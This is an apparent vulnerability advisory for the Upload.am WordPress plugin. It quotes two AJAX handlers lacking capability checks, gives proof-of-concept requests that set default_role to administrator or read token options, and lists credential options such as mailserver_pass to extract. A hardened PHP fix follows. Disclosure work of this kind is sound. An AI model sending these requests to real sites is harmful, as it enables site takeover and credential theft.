# Exploit Title: Upload.am 1.0.0 WordPress Plugin - Multiple Vulnerabilities
# Date: Aug 12, 2025
# Exploit Author: bRpsd cy[at]live.no
# Vendor Homepage: https://wordpress.org/plugins/upload-am-file-hosting-vpn/
# Version: <= 1.0.0
# Tested on: macOS, localhost XAMPP
# Authentication required: Low privilege
Critical: Unauthorized Settings Modification (CWE-862)
CVE-ID: N/A
CVSS: 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H)
Affected File: upload-am-file-hosting-vpn.php:283-291
Vulnerable Code:
283: add_action('wp_ajax_upload_am_update_option', function () {
284:     check_ajax_referer('upload_am_nonce', 'nonce'); // nonce check only, no capability check
285:     if (!isset($_POST['option_name']) || !isset($_POST['option_value'])) {
286:         wp_send_json_error(['message' => 'Missing required parameters']);
287:     }
288:     $option_name = sanitize_text_field(wp_unslash($_POST['option_name']));
289:     $option_value = sanitize_text_field(wp_unslash($_POST['option_value']));
290:     update_option($option_name, $option_value); // caller-chosen option name is written as-is
291:     wp_send_json_success(['message' => 'Option updated']);
Input Source:
Parameter: $_POST['option_name'] and $_POST['option_value']
Flow: User input -> sanitize_text_field() -> update_option() with no capability check
Impact:
Complete WordPress configuration control allowing:
  Privilege escalation (setting default_role to administrator)
  Site takeover (modifying admin_email, siteurl)
  Security bypass (disabling security plugins via active_plugins option)
  Malicious redirections and content injection
POC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_xxx=value

action=upload_am_update_option&option_name=default_role&option_value=administrator&nonce=VALID_NONCE_HERE
============================================================================================================
High: Sensitive Information Disclosure (CWE-200)
CVSS: 6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
Affected File: upload-am-file-hosting-vpn.php:275-281
Vulnerable Code:
275: add_action('wp_ajax_upload_am_get_option', function () {
276:     check_ajax_referer('upload_am_nonce', 'nonce'); // nonce check only, no capability check
277:     if (!isset($_POST['option_name'])) {
278:         wp_send_json_error(['message' => 'Missing option_name']);
279:     }
280:     $option_name = sanitize_text_field(wp_unslash($_POST['option_name']));
281:     $value = get_option($option_name); // caller-chosen option name is read as-is
282:     wp_send_json_success($value);
Input Source:
Parameter: $_POST['option_name']
Flow: User input -> sanitize_text_field() -> get_option() -> JSON response
POC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_xxx=value

action=upload_am_get_option&option_name=upload_am_access_token&nonce=VALID_NONCE_HERE
Additional sensitive options that can be extracted:
option_name=mailserver_login
option_name=mailserver_pass
# Site configuration
option_name=admin_email
option_name=users_can_register
option_name=active_plugins
option_name=siteurl
option_name=home
# Authentication tokens
option_name=upload_am_access_token
option_name=upload_am_refresh_token
Impact:
Exposure of sensitive WordPress configuration including:
  API tokens and credentials
  Plugin/theme configuration
  Administrative email addresses
  Site URLs and security settings
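
Mitigation sketch (added example, not part of the original advisory and not the vendor's code): both handlers can be closed by requiring the manage_options capability after the nonce check and by accepting only allowlisted option names. The helper upload_am_checked_option_name(), the constant UPLOAD_AM_AJAX_OPTIONS, and the assumption that only the plugin's two token options need AJAX access are hypothetical.

```php
<?php
// Added example: hardened replacements for the two AJAX handlers shown above.
// Assumption: the plugin only needs its own token options over AJAX; the
// allowlist is built from the option names that appear in this advisory.
const UPLOAD_AM_AJAX_OPTIONS = ['upload_am_access_token', 'upload_am_refresh_token'];

// Hypothetical helper: runs every check and returns a vetted option name.
// wp_send_json_error() terminates the request, so no explicit return is needed.
function upload_am_checked_option_name(): string {
    // The nonce ties the request to the plugin's page (CSRF protection).
    // It does not say anything about what the logged-in user may do.
    check_ajax_referer('upload_am_nonce', 'nonce');

    // Authorization: the check missing from both vulnerable handlers.
    if (!current_user_can('manage_options')) {
        wp_send_json_error(['message' => 'Forbidden'], 403);
    }
    if (!isset($_POST['option_name'])) {
        wp_send_json_error(['message' => 'Missing option_name'], 400);
    }
    $name = sanitize_key(wp_unslash($_POST['option_name']));

    // Never hand a caller-chosen name to get_option() or update_option().
    if (!in_array($name, UPLOAD_AM_AJAX_OPTIONS, true)) {
        wp_send_json_error(['message' => 'Option not allowed'], 400);
    }
    return $name;
}

add_action('wp_ajax_upload_am_get_option', function () {
    $name = upload_am_checked_option_name();
    wp_send_json_success(get_option($name));
});

add_action('wp_ajax_upload_am_update_option', function () {
    $name = upload_am_checked_option_name();
    if (!isset($_POST['option_value'])) {
        wp_send_json_error(['message' => 'Missing option_value'], 400);
    }
    $value = sanitize_text_field(wp_unslash($_POST['option_value']));
    update_option($name, $value);
    wp_send_json_success(['message' => 'Option updated']);
});
```

With this in place, a subscriber-level request for default_role or mailserver_pass is rejected with 403 before any option is read or written, and an administrator's request for a non-allowlisted name is rejected with 400.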